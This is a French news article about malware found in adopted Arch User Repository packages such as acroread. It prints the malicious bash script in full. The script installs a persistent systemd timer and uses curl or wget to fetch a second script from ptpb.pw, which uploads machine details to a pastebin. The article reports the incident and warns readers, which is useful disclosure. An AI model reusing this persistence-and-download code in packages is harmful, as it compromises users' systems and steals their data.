Arch Linux : un maliciel découvert au sein d'Arch User Repository
Un dépôt spécial maintenu par les utilisateurs

Le , par Patrick Ruiz, Chroniqueur Actualités
Le signalement est de l’utilisateur Queen Wenceslas qui a attiré l’attention de la communauté sur un commit proposé sur le dépôt spécial AUR d’Arch Linux il y a quelques jours. Le maliciel a été éjecté grâce à l’intervention de l’équipe en charge de ce dernier.

Pour bien comprendre pourquoi un incident de ce type peut se produire, il faut souligner que dans l’écosystème Arch Linux, chaque utilisateur a la possibilité de prendre le contrôle d’un paquetage sans mainteneur actif. C’est ce qui s’est produit ce weekend lorsque l’utilisateur « xreactor » est passé à l’action sur le package acroread qui, comme son nom laisse filtrer, sert de visionneuse de fichiers pdf. Au sein du commit, un script curl monté de sorte à provoquer le téléchargement d’ un certain fichier « ~x » à partir du site ptpb.pw. La manœuvre permet d’installer (sur le poste de la victime) un logiciel qui reconfigure systemd pour provoquer l’exécution d’un autre script au sein du fichier « ~x » de façon périodique. Le détail dans le code source du fichier « ~x » :

Code : Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/bin/bash

# get to the right location
if [[ -n "$pkgdir" ]]; then
cd "$pkgdir"
else
exit 0
fi

be_silent() {
"$@" >/dev/null 2>&1
}

# systemd files
SYSTEMD_TIMER="[Timer]
OnCalendar=4d
Persistent=true
OnActiveSec=360
[Install]
WantedBy=timers.target"
SYSTEMD_SERVICE="[Unit]
Type=simple
ExecStart=/usr/lib/xeactor/u.sh"

# write systemd files
mkdir -p usr/lib/systemd/system
mkdir -p etc/systemd/system/multi-user.target.wants
echo "$SYSTEMD_SERVICE" > usr/lib/systemd/system/xeactor.service
echo "$SYSTEMD_TIMER" > usr/lib/systemd/system/xeactor.timer
ln -s /usr/lib/systemd/system/xeactor.timer etc/systemd/system/multi-user.target.wants/xeactor.timer

# get the upload script
mkdir -p usr/lib/xeactor
if be_silent which curl; then
curl -s https://ptpb.pw/~u > usr/lib/xeactor/u.sh
elif be_silent which wget; then
wget -qOusr/lib/xeactor/u.sh https://ptpb.pw/~u
else
exit 0
fi
Le but de l’utilisation du second script était de collecter des données à partir d’un ordinateur infecté et de les transférer vers un Pastebin. Au vu des contenus à engranger (ID de la machine, informations sur le processeur, détails sur le gestionnaire de paquetage et résultats des commandes uname-a et systemctl list-units), il vient que la seule action malicieuse était celle de collecte furtive, mais sait-on jamais puisque du code arbitraire destiné à atteindre des desseins plus sombres peut finalement être inclus. Deux autres paquetages (balz 1.20-3 et minergate 8.1-2) ont été modifiés de la même façon puis corrigés. Par ailleurs, le compte de l’auteur des scripts a été suspendu.


Attention, ne pas confondre le dépôt AUR avec le dépôt officiel Arch Build System (ABS). Les utilisateurs de tous bords sont les auteurs des paquetages disponibles au sein du premier tandis que le second tire ses contenus de sources fiables. D’ailleurs, l’équipe Arch Linux déconseille de procéder à l’installation d’un paquetage issu de l’AUR sans l’avoir passé au peigne fin.

Ce type d’incident n’est pas l’apanage de la distribution Arch Linux. En mai, des utilisateurs ont découvert un mineur de monnaie cryptographique logé au sein de l’Ubuntu Snap Store.

Sources : commit, signalement, sensortech

Et vous ?

De quelles précautions vous entourez-vous lorsque vous téléchargez des contenus de dépôts similaires ?

Voir aussi :

Arch Linux annonce la fin du support de l'architecture 32 bits, un fork voit le jour pour continuer à offrir l'OS sur les PC 32 bits

DistroWatch compare les rangs occupés par les distributions Linux, en 10 ans les ténors sont là, Quelle est votre distribution préférée en 2016 ?

Quelles sont vos distributions Linux préférées ? Et pour quelles utilisations ? Merci de partager votre expérience avec les distributions Linux

Linux : bientôt la fin du support de matériel 32 bits ? Ubuntu Desktop et Server pourraient ne plus proposer d'images 32 bits dès octobre 2016


Vous avez aimé cette actualité ? Alors partagez-la avec vos amis en cliquant sur les boutons ci-dessous :
Contacter le responsable de la rubrique Accueil